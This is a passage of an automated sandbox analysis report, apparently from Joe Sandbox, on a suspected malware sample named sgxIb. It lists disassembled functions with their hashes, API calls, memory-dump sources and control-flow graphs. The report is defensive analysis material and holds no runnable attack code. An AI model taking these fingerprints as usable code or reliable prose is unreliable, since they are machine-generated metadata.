                                                                                                            • Opcode Fuzzy Hash: 7b4d181dd6192b8a67e99b236c3f2a4b63c581d12c6bd5381136d9c974d25c15
                                                                                                            • Instruction Fuzzy Hash: 221133B58003098FDB10DF8AC889BDEBBF8EB48310F20841AE818A7600C374A954CFA0
                                                                                                            Function 070157F0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0701584D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: 41f168ed683ddf95d7707c07c00f26904b451ed22afb8ad326f66769ce4fd464
                                                                                                            • Instruction ID: eb6707cd91a750fd306ac506b66665f6cc79977445a49e20ff3e93b41c12b8a5
                                                                                                            • Opcode Fuzzy Hash: 41f168ed683ddf95d7707c07c00f26904b451ed22afb8ad326f66769ce4fd464
                                                                                                            • Instruction Fuzzy Hash: 4811D0B58003499FDB10DF9AD889BDEBBF8EB48320F14841AE919A7640C375A954CFA5
                                                                                                            Function 07015801 Relevance: 1.5, APIs: 1, Instructions: 37windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0701584D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: 912edec6d5bd2b7f3e0de7a7ff79cda7fa6873e8abb83a690152b811f20703fb
                                                                                                            • Instruction ID: 19537ea5619cd4f9990119cecf2a32b86af42af9a6f80df553cc22092f708c39
                                                                                                            • Opcode Fuzzy Hash: 912edec6d5bd2b7f3e0de7a7ff79cda7fa6873e8abb83a690152b811f20703fb
                                                                                                            • Instruction Fuzzy Hash: D401D0B58003498FDB10CF99D889BDEFBF4EB48320F24845AD559A7250C375AA94CFA5
                                                                                                            Function 00B7FF30 Relevance: 1.3, APIs: 1, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNELBASE(?), ref: 00B7FF88
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803790583.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_b70000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: b4bb7ccfb1e686b5db78a34ccded1e031f01254eb16ce1af1f2a954e4d26f5c4
                                                                                                            • Instruction ID: ad8db687f4d7903e9c2e9e0604de8b7a827c0dc778f3bd9112913a066c3daada
                                                                                                            • Opcode Fuzzy Hash: b4bb7ccfb1e686b5db78a34ccded1e031f01254eb16ce1af1f2a954e4d26f5c4
                                                                                                            • Instruction Fuzzy Hash: A51145B28003498FCB10DF9AC445BEEBBF4EB48320F10846AD568A7340D738A944CFA5
                                                                                                            Function 00ABD4A0 Relevance: .1, Instructions: 75COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803576604.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_abd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: debb23ae0be83b41548a102f3f2d1437b87549a5dfd42f595700aac1591cc81e
                                                                                                            • Instruction ID: dfee19c44027a613f13ce45094d982ef2f6e038160d22f9a501c1da21cde8d9c
                                                                                                            • Opcode Fuzzy Hash: debb23ae0be83b41548a102f3f2d1437b87549a5dfd42f595700aac1591cc81e
                                                                                                            • Instruction Fuzzy Hash: 452148B1504200DFDB15DF04D9C0B66BF69FB94328F24C668D90A0B257D336D816CBA2
                                                                                                            Function 00ACD01C Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803607200.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_acd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c3e33ebd9e91f385c87e600f304f70d119512bc2cffc4682530b591094a36893
                                                                                                            • Instruction ID: c6fc35f1eea40bb80205a0a6e9c5fc048b619bf65272040754456772a0d7fe40
                                                                                                            • Opcode Fuzzy Hash: c3e33ebd9e91f385c87e600f304f70d119512bc2cffc4682530b591094a36893
                                                                                                            • Instruction Fuzzy Hash: 1E21CF75604200AFCB14DF18D984F26BBA5FB94324F24C97DD80B4B286C33AD807CA61
                                                                                                            Function 00ACD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803607200.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_acd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d7350899a6f4524702f5f4c3cb91d1eb844ceebd3b12e638f83ddcd50d7dc4dd
                                                                                                            • Instruction ID: c2db5c1e377e44b3d4caaa40014ab6c731b50a20508778cec37e5cdf1e110e27
                                                                                                            • Opcode Fuzzy Hash: d7350899a6f4524702f5f4c3cb91d1eb844ceebd3b12e638f83ddcd50d7dc4dd
                                                                                                            • Instruction Fuzzy Hash: 9E21F2B5604200EFDB05DF14D9C4F26BBA5FB94314F24CA7DE80A4B292C336D806CA61
                                                                                                            Function 00ACD006 Relevance: .1, Instructions: 62COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803607200.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_acd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 24294ea453c98cc209bd00a9c7498dc14019cf642899aa7efd08af2564cff0af
                                                                                                            • Instruction ID: 1cc896ab6a97f5c960a15b151fe41b5aff76f1fd141db7b2458a072c051cac62
                                                                                                            • Opcode Fuzzy Hash: 24294ea453c98cc209bd00a9c7498dc14019cf642899aa7efd08af2564cff0af
                                                                                                            • Instruction Fuzzy Hash: 422183755093808FC702CF24D594B15BF71EB46314F29C5EED84A8F6A7C33A980ACB62
                                                                                                            Function 00ABD49B Relevance: .1, Instructions: 56COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803576604.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_abd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                            • Instruction ID: f15bc737bcb4ac65e7a92345bb489620c63b5fb56fec00aa50ebe4e6d3095849
                                                                                                            • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                            • Instruction Fuzzy Hash: C911D376904240CFDB16CF14D5C4B56BF72FB94328F24C6A9D9090B257C336D85ACBA2
                                                                                                            Function 00ACD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803607200.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_acd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                            • Instruction ID: 092a5022f4ade034f53f1915c13ab76cb0ee959d39f16406194594534b9c587c
                                                                                                            • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                            • Instruction Fuzzy Hash: 7211DD76904280DFCB02CF10C9C4B15FBB2FB84324F24C6AED8494B296C33AD80ACB61
                                                                                                            Function 00ABD759 Relevance: .0, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803576604.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_abd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a0a3261d194939437aeb41a63a7213f39eb0fb40e1b9811d4b4ebc745adbacf3
                                                                                                            • Instruction ID: 4580f7c557388596aecf38ffc8522158095f958abc89fade1361f2ad45c792ef
                                                                                                            • Opcode Fuzzy Hash: a0a3261d194939437aeb41a63a7213f39eb0fb40e1b9811d4b4ebc745adbacf3
                                                                                                            • Instruction Fuzzy Hash: 8D01A7710053449AE7105B55DC84BE7BFECDF51325F18C95AED090A287DB799880C6B1
                                                                                                            Function 00ABD758 Relevance: .0, Instructions: 36COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803576604.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_abd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8c05a7be912493722f72c67e361d9798475feab7613859507cebe3651faae86d
                                                                                                            • Instruction ID: 03d394ea1e91fb0c7cc9b93ea38ed921a4179341b6873ad495c3c363fa41a5d7
                                                                                                            • Opcode Fuzzy Hash: 8c05a7be912493722f72c67e361d9798475feab7613859507cebe3651faae86d
                                                                                                            • Instruction Fuzzy Hash: DEF062724053449EE7208B16DC84BA7FFACEF51735F18C55AED084A286D779A884CAB1

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:13.4%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:23
                                                                                                            Total number of Limit Nodes:4
                                                                                                            execution_graph 27988 2980848 27990 298084e 27988->27990 27989 298091b 27990->27989 27993 2981458 27990->27993 27998 2981340 27990->27998 27996 2981356 27993->27996 27994 2981454 27994->27990 27996->27994 27997 2981458 2 API calls 27996->27997 28003 29880f9 27996->28003 27997->27996 27999 2981343 27998->27999 28000 2981454 27999->28000 28001 29880f9 2 API calls 27999->28001 28002 2981458 2 API calls 27999->28002 28000->27990 28001->27999 28002->27999 28004 2988103 28003->28004 28005 29881b9 28004->28005 28008 685fa88 28004->28008 28012 685fa78 28004->28012 28005->27996 28009 685fa9d 28008->28009 28010 685fcae 28009->28010 28011 685fcc9 GlobalMemoryStatusEx GlobalMemoryStatusEx 28009->28011 28010->28005 28011->28009 28013 685fa9d 28012->28013 28014 685fcae 28013->28014 28015 685fcc9 GlobalMemoryStatusEx GlobalMemoryStatusEx 28013->28015 28014->28005 28015->28013

                                                                                                            Executed Functions

                                                                                                            Function 06853580 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 125 6853580-68535a1 126 68535a3-68535a6 125->126 127 6853d47-6853d4a 126->127 128 68535ac-68535cb 126->128 129 6853d70-6853d72 127->129 130 6853d4c-6853d6b 127->130 138 68535e4-68535ee 128->138 139 68535cd-68535d0 128->139 131 6853d74 129->131 132 6853d79-6853d7c 129->132 130->129 131->132 132->126 135 6853d82-6853d8b 132->135 143 68535f4-6853603 138->143 139->138 140 68535d2-68535e2 139->140 140->143 254 6853605 call 6853da0 143->254 255 6853605 call 6853d99 143->255 144 685360a-685360f 145 6853611-6853617 144->145 146 685361c-68538f9 144->146 145->135 167 68538ff-68539ae 146->167 168 6853d39-6853d46 146->168 177 68539d7 167->177 178 68539b0-68539d5 167->178 180 68539e0-68539f3 call 685316c 177->180 178->180 183 6853d20-6853d2c 180->183 184 68539f9-6853a1b call 6853178 180->184 183->167 185 6853d32 183->185 184->183 188 6853a21-6853a2b 184->188 185->168 188->183 189 6853a31-6853a3c 188->189 189->183 190 6853a42-6853b18 189->190 202 6853b26-6853b56 190->202 203 6853b1a-6853b1c 190->203 207 6853b64-6853b70 202->207 208 6853b58-6853b5a 202->208 203->202 209 6853bd0-6853bd4 207->209 210 6853b72-6853b76 207->210 208->207 211 6853d11-6853d1a 209->211 212 6853bda-6853c16 209->212 210->209 213 6853b78-6853ba2 210->213 211->183 211->190 225 6853c24-6853c32 212->225 226 6853c18-6853c1a 212->226 220 6853ba4-6853ba6 213->220 221 6853bb0-6853bcd call 6853184 213->221 220->221 221->209 228 6853c34-6853c3f 225->228 229 6853c49-6853c54 225->229 226->225 228->229 232 6853c41 228->232 233 6853c56-6853c5c 229->233 234 6853c6c-6853c7d 229->234 232->229 235 6853c60-6853c62 233->235 236 6853c5e 233->236 238 6853c95-6853ca1 234->238 239 6853c7f-6853c85 234->239 235->234 236->234 243 6853ca3-6853ca9 238->243 244 6853cb9-6853d0a 238->244 240 6853c87 239->240 241 6853c89-6853c8b 239->241 240->238 241->238 245 6853cad-6853caf 243->245 246 6853cab 243->246 244->211 245->244 246->244 254->144 255->144
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2392861976
                                                                                                            • Opcode ID: 8e4f15b44e058ea9b374504043dcf9f78399042a34ee97da3bfbe8b44603dae5
                                                                                                            • Instruction ID: f04378e012f57108423a495e29fe3775929a0a62eceb3456c362c00b5ccf0592
                                                                                                            • Opcode Fuzzy Hash: 8e4f15b44e058ea9b374504043dcf9f78399042a34ee97da3bfbe8b44603dae5
                                                                                                            • Instruction Fuzzy Hash: 05324F31E1071A8FCB14EF78C89459DB7B2BFC9304F5186A9D509AB624EF30AD85CB91
                                                                                                            Function 06857E98 Relevance: 3.0, Strings: 2, Instructions: 474COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1155 6857e98-6857eb6 1156 6857eb8-6857ebb 1155->1156 1157 6857ebd-6857ed7 1156->1157 1158 6857edc-6857edf 1156->1158 1157->1158 1159 6857ef6-6857ef9 1158->1159 1160 6857ee1-6857eef 1158->1160 1161 6857f1c-6857f1f 1159->1161 1162 6857efb-6857f17 1159->1162 1167 6857ef1 1160->1167 1168 6857f3e-6857f54 1160->1168 1165 6857f21-6857f2b 1161->1165 1166 6857f2c-6857f2e 1161->1166 1162->1161 1171 6857f35-6857f38 1166->1171 1172 6857f30 1166->1172 1167->1159 1175 685816f-6858179 1168->1175 1176 6857f5a-6857f63 1168->1176 1171->1156 1171->1168 1172->1171 1177 6857f69-6857f86 1176->1177 1178 685817a-6858182 1176->1178 1186 685815c-6858169 1177->1186 1187 6857f8c-6857fb4 1177->1187 1181 6858184-6858188 1178->1181 1182 685818a 1178->1182 1181->1182 1184 6858192-68581af 1182->1184 1185 685818c-685818e 1182->1185 1188 68581b1-68581b4 1184->1188 1185->1184 1186->1175 1186->1176 1187->1186 1203 6857fba-6857fc3 1187->1203 1189 68583e9-68583ec 1188->1189 1190 68581ba-68581c9 1188->1190 1191 685840f-6858412 1189->1191 1192 68583ee-685840a 1189->1192 1197 68581e8-685822c 1190->1197 1198 68581cb-68581e6 1190->1198 1195 68584bd-68584bf 1191->1195 1196 6858418-6858424 1191->1196 1192->1191 1201 68584c6-68584c9 1195->1201 1202 68584c1 1195->1202 1205 685842f-6858431 1196->1205 1216 6858232-6858243 1197->1216 1217 68583bd-68583d3 1197->1217 1198->1197 1201->1188 1204 68584cf-68584d8 1201->1204 1202->1201 1203->1178 1211 6857fc9-6857fe5 1203->1211 1206 6858433-6858439 1205->1206 1207 6858449-685844d 1205->1207 1212 685843d-685843f 1206->1212 1213 685843b 1206->1213 1214 685844f-6858459 1207->1214 1215 685845b 1207->1215 1222 6857feb-6858015 1211->1222 1223 685814a-6858156 1211->1223 1212->1207 1213->1207 1218 6858460-6858462 1214->1218 1215->1218 1228 6858249-6858266 1216->1228 1229 68583a8-68583b7 1216->1229 1217->1189 1224 6858464-6858467 1218->1224 1225 6858473-68584ac 1218->1225 1240 6858140-6858145 1222->1240 1241 685801b-6858043 1222->1241 1223->1186 1223->1203 1224->1204 1225->1190 1246 68584b2-68584bc 1225->1246 1228->1229 1237 685826c-6858362 call 68566b8 1228->1237 1229->1216 1229->1217 1292 6858364-685836e 1237->1292 1293 6858370 1237->1293 1240->1223 1241->1240 1250 6858049-6858077 1241->1250 1250->1240 1255 685807d-6858086 1250->1255 1255->1240 1256 685808c-68580be 1255->1256 1264 68580c0-68580c4 1256->1264 1265 68580c9-68580e5 1256->1265 1264->1240 1267 68580c6 1264->1267 1265->1223 1268 68580e7-685813e call 68566b8 1265->1268 1267->1265 1268->1223 1294 6858375-6858377 1292->1294 1293->1294 1294->1229 1295 6858379-685837e 1294->1295 1296 6858380-685838a 1295->1296 1297 685838c 1295->1297 1298 6858391-6858393 1296->1298 1297->1298 1298->1229 1299 6858395-68583a1 1298->1299 1299->1229
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q
                                                                                                            • API String ID: 0-355816377
                                                                                                            • Opcode ID: c5f67d4d1f0cd1f664699a83f9575778db5fba3fa1dedaf297c052511f3d702c
                                                                                                            • Instruction ID: 0be8559916c394d2f16544689854e19f96f27fe6ae997f93c4840be6bd6f674d
                                                                                                            • Opcode Fuzzy Hash: c5f67d4d1f0cd1f664699a83f9575778db5fba3fa1dedaf297c052511f3d702c
                                                                                                            • Instruction Fuzzy Hash: 5102AE70B006258FDB54DB68D9906AEB7F2FF84304F15892AE909DB794DB34EC42CB91
                                                                                                            Function 06850007 Relevance: 2.0, Instructions: 1968COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6a3690b6c78c5d50ef055e4752ac18cb13ba456740bb0e59ea5ae2a1cda98bad
                                                                                                            • Instruction ID: d4ed230c1248f48d100debfb6a337728109255016de2254854b1a40599760b6a
                                                                                                            • Opcode Fuzzy Hash: 6a3690b6c78c5d50ef055e4752ac18cb13ba456740bb0e59ea5ae2a1cda98bad
                                                                                                            • Instruction Fuzzy Hash: 1623FA31D10B198ACB11EF68C8946ADF7B1FF99300F15D79AE458B7221EB70AAC5CB41
                                                                                                            Function 06850040 Relevance: 2.0, Instructions: 1962COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e1b80761b6b7b02449fc681470cc2622842bc13f5f438f3f3355a51975ccfd57
                                                                                                            • Instruction ID: 87454cce8196a31ecf1e2b86963311cde5d81c7b8cfa163b56769a3907e36e00
                                                                                                            • Opcode Fuzzy Hash: e1b80761b6b7b02449fc681470cc2622842bc13f5f438f3f3355a51975ccfd57
                                                                                                            • Instruction Fuzzy Hash: 86230A31D10B198ACB11EF68C8946ADF7B1FF99300F15D79AE458B7221EB70AAC5CB41
                                                                                                            Function 068556B0 Relevance: 1.8, Strings: 1, Instructions: 590COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $
                                                                                                            • API String ID: 0-3993045852
                                                                                                            • Opcode ID: 9ce73c27caf0d5d5a079dade0ec931c5fdcf991b9351370e6cedcbdf4da4b971
                                                                                                            • Instruction ID: 062d34a44f0dfa223e5625e6de41b4113fb3a0abcbb9c4c9a02627fd6a42af1e
                                                                                                            • Opcode Fuzzy Hash: 9ce73c27caf0d5d5a079dade0ec931c5fdcf991b9351370e6cedcbdf4da4b971
                                                                                                            • Instruction Fuzzy Hash: F622DF75E002158FDF60DBA4C4947AEBBF2EF84324F21846AD949EB344DA35DD42CB92
                                                                                                            Function 06856708 Relevance: .8, Instructions: 819COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f1b2854bdf0202a3a5bdef57aba0b49ba166599927d645a6ef7676801cc698a7
                                                                                                            • Instruction ID: 4c78a974e413beed5d7c5654ccc1c5915311cdf031a719c0951466392e0511f5
                                                                                                            • Opcode Fuzzy Hash: f1b2854bdf0202a3a5bdef57aba0b49ba166599927d645a6ef7676801cc698a7
                                                                                                            • Instruction Fuzzy Hash: CA62B034B002148FDB54DB68D554AADB7F2FF84314F658469E90AEB360EB35EC82CB91
                                                                                                            Function 0685ADE8 Relevance: 11.6, Strings: 9, Instructions: 390COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 685ade8-685ae06 1 685ae08-685ae0b 0->1 2 685ae0d-685ae29 1->2 3 685ae2e-685ae31 1->3 2->3 4 685b005-685b00e 3->4 5 685ae37-685ae3a 3->5 6 685b014-685b01e 4->6 7 685ae91-685ae9a 4->7 9 685ae3c-685ae49 5->9 10 685ae4e-685ae51 5->10 13 685aea0-685aea4 7->13 14 685b01f-685b056 7->14 9->10 11 685ae53-685ae57 10->11 12 685ae62-685ae65 10->12 11->6 16 685ae58-685ae5e 11->16 17 685ae67-685ae6c 12->17 18 685ae6f-685ae72 12->18 20 685aea9-685aeac 13->20 28 685b058-685b05b 14->28 16->12 17->18 22 685ae74-685ae87 18->22 23 685ae8c-685ae8f 18->23 24 685aebc-685aebe 20->24 25 685aeae-685aeb7 20->25 22->23 23->7 23->20 26 685aec5-685aec8 24->26 27 685aec0 24->27 25->24 26->1 29 685aece-685aef2 26->29 27->26 30 685b05d-685b079 28->30 31 685b07e-685b081 28->31 50 685b002 29->50 51 685aef8-685af07 29->51 30->31 33 685b090-685b093 31->33 34 685b083 call 685b3e7 31->34 35 685b095-685b099 33->35 36 685b0a0-685b0a3 33->36 42 685b089-685b08b 34->42 39 685b0a9-685b0e4 35->39 40 685b09b 35->40 36->39 41 685b30c-685b30f 36->41 52 685b2d7-685b2ea 39->52 53 685b0ea-685b0f6 39->53 40->36 43 685b311-685b31b 41->43 44 685b31c-685b31e 41->44 42->33 47 685b325-685b328 44->47 48 685b320 44->48 47->28 54 685b32e-685b338 47->54 48->47 50->4 58 685af1f-685af5a call 68566b8 51->58 59 685af09-685af0f 51->59 56 685b2ec 52->56 61 685b116-685b15a 53->61 62 685b0f8-685b111 53->62 60 685b2ed 56->60 75 685af72-685af89 58->75 76 685af5c-685af62 58->76 63 685af11 59->63 64 685af13-685af15 59->64 60->60 80 685b176-685b1b5 61->80 81 685b15c-685b16e 61->81 62->56 63->58 64->58 90 685afa1-685afb2 75->90 91 685af8b-685af91 75->91 78 685af64 76->78 79 685af66-685af68 76->79 78->75 79->75 85 685b29c-685b2b1 80->85 86 685b1bb-685b296 call 68566b8 80->86 81->80 85->52 86->85 97 685afb4-685afba 90->97 98 685afca-685affb 90->98 92 685af95-685af97 91->92 93 685af93 91->93 92->90 93->90 100 685afbc 97->100 101 685afbe-685afc0 97->101 98->50 100->98 101->98
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: `$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-1655561035
                                                                                                            • Opcode ID: 2b2b340d9c6b96f87ccf5633cc5f1a2ed8a6ac268a94b9506c7c45a14243c967
                                                                                                            • Instruction ID: 35829f733fc6b05394b784df582b491116283753aa125734691730b4442dc938
                                                                                                            • Opcode Fuzzy Hash: 2b2b340d9c6b96f87ccf5633cc5f1a2ed8a6ac268a94b9506c7c45a14243c967
                                                                                                            • Instruction Fuzzy Hash: 70E16D30E102198FDF69DF68D5906AEB7F2FF88304F118929E909EB354DB74D8468B91
                                                                                                            Function 06859268 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 256 6859268-685928d 257 685928f-6859292 256->257 258 6859294-68592b3 257->258 259 68592b8-68592bb 257->259 258->259 260 68592c1-68592d6 259->260 261 6859b7b-6859b7d 259->261 268 68592ee-6859304 260->268 269 68592d8-68592de 260->269 263 6859b84-6859b87 261->263 264 6859b7f 261->264 263->257 266 6859b8d-6859b97 263->266 264->263 273 685930f-6859311 268->273 270 68592e0 269->270 271 68592e2-68592e4 269->271 270->268 271->268 274 6859313-6859319 273->274 275 6859329-685939a 273->275 276 685931d-685931f 274->276 277 685931b 274->277 286 68593c6-68593e2 275->286 287 685939c-68593bf 275->287 276->275 277->275 292 68593e4-6859407 286->292 293 685940e-6859429 286->293 287->286 292->293 298 6859454-685946f 293->298 299 685942b-685944d 293->299 304 6859471-6859493 298->304 305 685949a-68594a4 298->305 299->298 304->305 306 68594b4-685952e 305->306 307 68594a6-68594af 305->307 313 6859530-685954e 306->313 314 685957b-6859590 306->314 307->266 318 6859550-685955f 313->318 319 685956a-6859579 313->319 314->261 318->319 319->313 319->314
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
